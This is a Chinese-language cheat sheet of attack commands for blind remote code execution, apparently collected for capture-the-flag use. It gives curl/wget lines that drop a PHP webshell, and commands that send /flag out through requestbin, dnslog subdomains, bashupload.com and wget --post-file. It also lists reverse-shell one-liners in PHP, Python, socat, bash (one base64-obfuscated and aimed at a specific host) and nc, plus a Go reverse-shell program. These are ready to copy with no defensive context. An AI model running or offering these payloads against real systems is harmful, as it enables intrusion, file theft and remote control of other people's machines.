RCE_无回显

<aside> 💡

无回显

</aside>

写文件

**curl -o shell.php <http://xxxxxx.txt>
wget -O shell.php <http://xxxxxx.txt>**

请求带出

**curl <http://requestbin.net/r/1kiej1p1?p=`cat> /flag|base64`
curl `xxd -p /flag`.xxxxxx.dnslog.cn  #dnslog带外
curl bashupload.com -T your_file.txt #bashupload.com带外下载文件
wget --post-file ./flag [IP]:[Port]**

平台：

**<http://www.dnslog.cn/>	   //只能使用 dnslog 外带，另外很多防火墙会 ban 掉该域名。
<http://ceye.io/>	         //可以使用 http 外带和 dnslog 外带，推荐。**

<aside> 💡

反弹shell

</aside>

php

**php -r '$sock=fsockopen("ip",6666);exec("/bin/bash -i <&3 >&3 2>&3");'**

python

**python3 -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("your-ip",7777));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your-ip",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -lvvnp 2333
  
python3 -c "import pty;pty.spawn('/bin/bash')" #模拟终端**

socat

**socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:port**

bash

**bash -c "bash -i > /dev/tcp/[IP]/[Port] 0>&1 2>&1"
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9tYXg2LmZ1bi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'
nc [IP] [Port] -e /bin/sh
#接收
nc -lvvnp [Port]**

go

**package main

import (
    "fmt"
    "log"
    "os/exec"
)

func main() {
    cmd := exec.Command("bash", "-c", "bash -i >& /dev/tcp/IP/PORT 0>&1")
    out, err := cmd.CombinedOutput()
    if err != nil {
        fmt.Printf("combined out:\\n%s\\n", string(out))
        log.Fatalf("cmd.Run() failed with %s\\n", err)
    }
    fmt.Printf("combined out:\\n%s\\n", string(out))
}**